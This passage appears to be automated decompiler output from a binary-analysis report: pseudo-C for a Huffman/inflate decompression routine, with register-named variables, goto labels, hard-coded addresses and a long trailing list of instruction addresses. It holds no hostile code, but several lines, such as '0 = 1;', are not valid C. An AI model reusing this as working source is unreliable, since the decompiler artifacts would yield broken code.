											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3a8;
												if( *0x42e3a8 != 0) {
													L22:
													_t412 =  *0x40a42c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d224; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d220; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d228;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6a8;
													if(_t416 < 0x42d6a8) {
														L15:
														__eflags = _t416 - 0x42d464;
														_t438 = 8;
														if(_t416 > 0x42d464) {
															__eflags = _t416 - 0x42d628;
															if(_t416 >= 0x42d628) {
																__eflags = _t416 - 0x42d688;
																if(_t416 < 0x42d688) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d228, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d228 + _t440;
														E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d220, 0x40a430, 0x42db28, _t448 - 8);
														 *0x42e3a8 =  *0x42e3a8 + 1;
														__eflags =  *0x42e3a8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406945
0x00406945
0x00406945
0x00406945
0x00406945
0x00406949
0x00000000
0x00000000
0x0040694f
0x0040694f
0x00406952
0x00406955
0x0040695a
0x0040695c
0x0040695f
0x00406962
0x00406965
0x00406965
0x00406968
0x00000000
0x00000000
0x0040696a
0x0040696a
0x0040696d
0x00406972
0x00406974
0x00406977
0x0040697d
0x004066dc
0x004066dc
0x004066df
0x004066e5
0x004066eb
0x004066f4
0x004066fa
0x004066fd
0x00406704
0x00406709
0x0040670f
0x0040671a
0x0040671a
0x00406983
0x00406983
0x0040698d
0x00000000
0x00000000
0x00406993
0x00406993
0x00406997
0x0040699a
0x0040699a
0x0040699e
0x004069a4
0x004069a4
0x004069a7
0x004069aa
0x004069b0
0x00000000
0x00000000
0x004069b2
0x004069d4
0x004069d4
0x004069d7
0x00000000
0x00000000
0x004069b4
0x004069b8
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c1
0x004069c4
0x004069c9
0x004069cb
0x004069ce
0x004069d1
0x004069d1
0x004069d9
0x004069d9
0x004069df
0x004069e2
0x004069e5
0x004069e5
0x004069ec
0x004069f0
0x004069f4
0x004069f7
0x004069fa
0x00406a00
0x00406a05
0x00000000
0x00000000
0x00406a07
0x00406a1b
0x00406a1b
0x00406a1f
0x00000000
0x00000000
0x00406a09
0x00406a0c
0x00406a0c
0x00406a13
0x00406a18
0x00406a18
0x00406a18
0x00406a21
0x00406a21
0x00406a24
0x00406a32
0x00406a38
0x00406a3d
0x00406a43
0x00406a49
0x00406a4f
0x00406a56
0x00406a6a
0x00406a6a
0x00407039
0x00407039
0x00407039
0x0040703e
0x00000000
0x00000000
0x00406676
0x00406676
0x00000000
0x00406c71
0x00406c71
0x00406c75
0x00406c78
0x00406c7b
0x00406c7e
0x00000000
0x00000000
0x00406c84
0x00406c84
0x00406ca9
0x00406ca9
0x00406ca9
0x00406cab
0x00000000
0x00000000
0x00406c89
0x00406c89
0x00406c8d
0x00000000
0x00000000
0x00406c93
0x00406c93
0x00406c96
0x00406c99
0x00406c9c
0x00406c9e
0x00406ca0
0x00406ca3
0x00406ca6
0x00406ca6
0x00406ca6
0x00406cad
0x00406cad
0x00406cb5
0x00406cb8
0x00406cbb
0x00406cbe
0x00406cc2
0x00406cc5
0x00406cc7
0x00406cca
0x00406ccc
0x00406ce0
0x00406ce0
0x00406ce3
0x00406cfd
0x00406cfd
0x00406d00
0x00000000
0x00000000
0x00406d06
0x00406d06
0x00406d09
0x00000000
0x00000000
0x00406d0f
0x00406d0f
0x00000000
0x00406d0f
0x00406ce5
0x00406ce8
0x00406cef
0x00406cf2
0x00000000
0x00406cf2
0x00406cce
0x00406cd2
0x00406cd5
0x00000000
0x00000000
0x00406d1a
0x00406d1a
0x00406d3f
0x00406d3f
0x00406d3f
0x00406d41
0x00000000
0x00000000
0x00406d1f
0x00406d1f
0x00406d23
0x00000000
0x00000000
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d34
0x00406d36
0x00406d39
0x00406d3c
0x00406d3c
0x00406d3c
0x00406d43
0x00406d4b
0x00406d4e
0x00406d51
0x00406d53
0x00406d56
0x00406d56
0x00406d58
0x00406d5c
0x00406d5f
0x00406d62
0x00406d65
0x00000000
0x00000000
0x00406d6b
0x00406d6b
0x00406d90
0x00406d90
0x00406d90
0x00406d92
0x00000000
0x00000000
0x00406d70
0x00406d70
0x00406d74
0x00000000
0x00000000
0x00406d7a
0x00406d7a
0x00406d7d
0x00406d80
0x00406d83
0x00406d85
0x00406d87
0x00406d8a
0x00406d8d
0x00406d8d
0x00406d8d
0x00406d94
0x00406d94
0x00406d9c
0x00406d9f
0x00406da2
0x00406da5
0x00406da9
0x00406dac
0x00406dae
0x00406db1
0x00406db4
0x00406dce
0x00406dce
0x00406dd1
0x00000000
0x00000000
0x00406dd7
0x00406dd7
0x00406dda
0x00406de1
0x00000000
0x00406de1
0x00406db6
0x00406db9
0x00406dc0
0x00406dc3
0x00000000
0x00000000
0x00406de9
0x00406de9
0x00406e0e
0x00406e0e
0x00406e0e
0x00406e10
0x00000000
0x00000000
0x00406dee
0x00406dee
0x00406df2
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfb
0x00406dfe
0x00406e01
0x00406e03
0x00406e05
0x00406e08
0x00406e0b
0x00406e0b
0x00406e0b
0x00406e12
0x00406e1a
0x00406e1d
0x00406e20
0x00406e22
0x00406e25
0x00406e25
0x00406e27
0x00000000
0x00000000
0x00406e2d
0x00406e2d
0x00406e30
0x00406e35
0x00406e37
0x00406e3d
0x00406e3f
0x00406e54
0x00406e56
0x00406e56
0x00406e41
0x00406e47
0x00406e49
0x00406e4b
0x00406e4b
0x00406e58
0x00406e5c
0x00406e5f
0x00406e65
0x00406e65
0x00406e68
0x00406e68
0x00406e68
0x00406e6a
0x00000000
0x00000000
0x00406e70
0x00406e70
0x00406e76
0x00406e78
0x00406e9d
0x00406ea0
0x00406ea6
0x00406eab
0x00406eb1
0x00406eb7
0x00406eb9
0x00406ebc
0x00406ec5
0x00406ecb
0x00406ecb
0x00406ebe
0x00406ec0
0x00406ec2
0x00406ec2
0x00406ecd
0x00406ed3
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee0
0x00406ee2
0x00406ee4
0x00406ee6
0x00406ee8
0x00406eeb
0x00406ef4
0x00406ef7
0x00406ef7
0x00406eed
0x00406eed
0x00406ef0
0x00406ef0
0x00406eeb
0x00406ee2
0x00406ef9
0x00406efb
0x00000000
0x00000000
0x00000000
0x00000000
0x00406efb
0x00406e7a
0x00406e7a
0x00406e80
0x00406e86
0x00406e88
0x00000000
0x00000000
0x00406e8a
0x00406e8a
0x00406e8c
0x00406e8e
0x00406e97
0x00406e97
0x00406e90
0x00406e90
0x00406e93
0x00406e93
0x00406e99
0x00406e9b
0x00000000
0x00000000
0x00406f01
0x00406f01
0x00406f06
0x00406f08
0x00406f09
0x00406f0a
0x00406f0b
0x00406f11
0x00406f14
0x00406f17
0x00406f1a
0x00406f1c
0x00406f22
0x00406f22
0x00406f25
0x00406f25
0x00406f25
0x00406f25
0x00406f2e
0x00000000
0x00000000
0x00406f33
0x00406f33
0x00406f36
0x00406f39
0x00406f3b
0x00406fd2
0x00406fd2
0x00406fd5
0x00406fd7
0x00406fd8
0x00406fd9
0x00406fdc
0x00000000
0x00406fdc
0x00406f41
0x00406f41
0x00406f47
0x00406f49
0x00406f6e
0x00406f71
0x00406f77
0x00406f7c
0x00406f82
0x00406f88
0x00406f8a
0x00406f8d
0x00406f96
0x00406f9c
0x00406f9c
0x00406f8f
0x00406f91
0x00406f93
0x00406f93
0x00406f9e
0x00406fa4
0x00406fa6
0x00406fa9
0x00406fab
0x00406fb1
0x00406fb3
0x00406fb5
0x00406fb7
0x00406fb9
0x00406fbc
0x00406fc5
0x00406fc8
0x00406fc8
0x00406fbe
0x00406fbe
0x00406fc1
0x00406fc1
0x00406fbc
0x00406fb3
0x00406fca
0x00406fcc
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fcc
0x00406f4b
0x00406f4b
0x00406f51
0x00406f57
0x00406f59
0x00000000
0x00000000
0x00406f5b
0x00406f5b
0x00406f5d
0x00406f5f
0x00406f66
0x00406f66
0x00406f68
0x00406f61
0x00406f61
0x00406f63
0x00406f63
0x00406f6a
0x00406f6c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe4
0x00406fe4
0x00406fe7
0x00406fe9
0x00406fec
0x00406fef
0x00406fef
0x00406fef
0x00406fef
0x00000000
0x00000000
0x00000000
0x0040669d
0x00406681
0x00000000
0x00406687
0x0040668a
0x00406694
0x00406697
0x0040669a
0x00000000
0x0040669a
0x00406681
0x004066a5
0x004066a8
0x004066ac
0x004066b6
0x004066c0
0x004066c3
0x004066c9
0x004067fd
0x004067ff
0x00406805
0x00406808
0x0040680b
0x00000000
0x0040680b
0x004066cf
0x004066cf
0x004066d0
0x00406728
0x00406728
0x0040672f
0x004067d5
0x004067d5
0x004067da
0x004067dd
0x004067e2
0x004067e5
0x004067ea
0x004067ed
0x004067f2
0x004067f5
0x004067f5
0x00000000
0x00406735
0x00406735
0x00406735
0x00406735
0x00406739
0x00406739
0x0040675b
0x0040675e
0x00406760
0x00406763
0x00406768
0x0040673e
0x0040673e
0x00406743
0x00406745
0x00406747
0x0040674c
0x00406752
0x00406757
0x00406759
0x00406759
0x0040674e
0x0040674e
0x0040674e
0x0040674c
0x00000000
0x0040676a
0x00406797
0x0040679c
0x0040679e
0x0040679f
0x004067a1
0x004067a2
0x004067a2
0x004067a2
0x004067ca
0x004067cf
0x004067cf
0x00000000
0x004067cf
0x00406768
0x0040672f
0x004066d2
0x004066d2
0x004066d3
0x0040671d
0x00000000
0x0040671d
0x004066d5
0x004066d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00406832
0x00406832
0x00406832
0x00406835
0x00000000
0x00000000
0x00406812
0x00406812
0x00406816
0x00000000
0x00000000
0x0040681c
0x0040681c
0x0040681f
0x00406822
0x00406827
0x00406829
0x0040682c
0x0040682f
0x0040682f
0x0040682f
0x00406837
0x00406837
0x0040683a
0x0040683c
0x00406841
0x00406844
0x00406846
0x00406849
0x00000000
0x00000000
0x0040684f
0x0040684f
0x00406851
0x00000000
0x00000000
0x00406857
0x00406857
0x0040685b
0x00000000
0x00000000
0x00406861
0x00406861
0x00406864
0x00406866
0x00406904
0x00406904
0x00406907
0x00406909
0x00406909
0x0040690c
0x0040690f
0x00406911
0x00406913
0x00406915
0x00406915
0x0040691e
0x00406923
0x00406926
0x00406929
0x0040692c
0x0040692f
0x0040692f
0x0040692f
0x00406932
0x00406938
0x00406938
0x0040693e
0x0040693e
0x0040693e
0x00000000
0x00406932
0x0040686c
0x0040686c
0x00406872
0x00406875
0x00406877
0x004068a2
0x004068a5
0x004068ab
0x004068b0
0x004068b6
0x004068bc
0x004068be
0x004068c1
0x004068ca
0x004068d0
0x004068d0
0x004068c3
0x004068c5
0x004068c7
0x004068c7
0x004068d2
0x004068d8
0x004068db
0x004068dd
0x004068df
0x004068e5
0x004068e7
0x004068e9
0x004068ec
0x004068f5
0x004068f5
0x004068f7
0x004068ee
0x004068ee
0x004068f1
0x004068f1
0x004068f9
0x004068f9
0x004068e7
0x004068fc
0x004068fe
0x00000000
0x00000000
0x00000000
0x00000000
0x004068fe
0x00406879
0x00406879
0x0040687f
0x00406885
0x00406887
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688b
0x0040688d
0x00406890
0x00406897
0x00406897
0x00406899
0x00406892
0x00406892
0x00406894
0x00406894
0x0040689b
0x0040689d
0x004068a0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a4
0x004069a7
0x004069aa
0x004069b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b87
0x00406b87
0x00406b87
0x00406b8a
0x00406b8d
0x00406b8f
0x00406b92
0x00406b98
0x00406b9f
0x00406ba1
0x00000000
0x00000000
0x00406a75
0x00406a75
0x00406a9d
0x00406a9d
0x00406a9d
0x00406a9f
0x00000000
0x00000000
0x00406a7d
0x00406a7d
0x00406a81
0x00000000
0x00000000
0x00406a87
0x00406a87
0x00406a8a
0x00406a8d
0x00406a90
0x00406a92
0x00406a94
0x00406a97
0x00406a9a
0x00406a9a
0x00406a9a
0x00406aa1
0x00406aa1
0x00406aa9
0x00406aac
0x00406ab2
0x00406ab5
0x00406ab9
0x00406abd
0x00406ac0
0x00406ac3
0x00406adb
0x00406adb
0x00406ade
0x00406aec
0x00406aef
0x00406ae0
0x00406ae0
0x00406ae2
0x00406ae9
0x00406ae9
0x00406b18
0x00406b18
0x00406b18
0x00406b1b
0x00406b1d
0x00000000
0x00000000
0x00406af8
0x00406af8
0x00406afc
0x00000000
0x00000000
0x00406b02
0x00406b02
0x00406b05
0x00406b08
0x00406b0b
0x00406b0d
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b15
0x00406b1f
0x00406b1f
0x00406b21
0x00406b23
0x00406b2e
0x00406b31
0x00406b34
0x00406b36
0x00406b38
0x00406b3a
0x00406b3d
0x00406b40
0x00406b45
0x00406b48
0x00406b4b
0x00406b4e
0x00406b55
0x00406b58
0x00406b5a
0x00000000
0x00000000
0x00406b60
0x00406b60
0x00406b64
0x00406b75
0x00406b75
0x00406b75
0x00406b77
0x00406b77
0x00406b7b
0x00406b7b
0x00406b7b
0x00406b7d
0x00406b7e
0x00406b81
0x00406b81
0x00406b81
0x00406b84
0x00000000
0x00406b84
0x00406b66
0x00406b66
0x00406b69
0x00000000
0x00000000
0x00406b6f
0x00406b6f
0x00000000
0x00406b6f
0x00406ac5
0x00406ac5
0x00406ac7
0x00406ac9
0x00406acc
0x00406acf
0x00406ad3
0x00406ad3
0x00406ba7
0x00406ba7
0x00406baa
0x00406bb1
0x00406bb5
0x00406bb7
0x00406bba
0x00406bbd
0x00406bc2
0x00406bc5
0x00406bc7
0x00406bc8
0x00406bcb
0x00406bd6
0x00406bd9
0x00406bf0
0x00406bf5
0x00406bfc
0x00406c01
0x00406c05
0x00406c07
0x00406c07
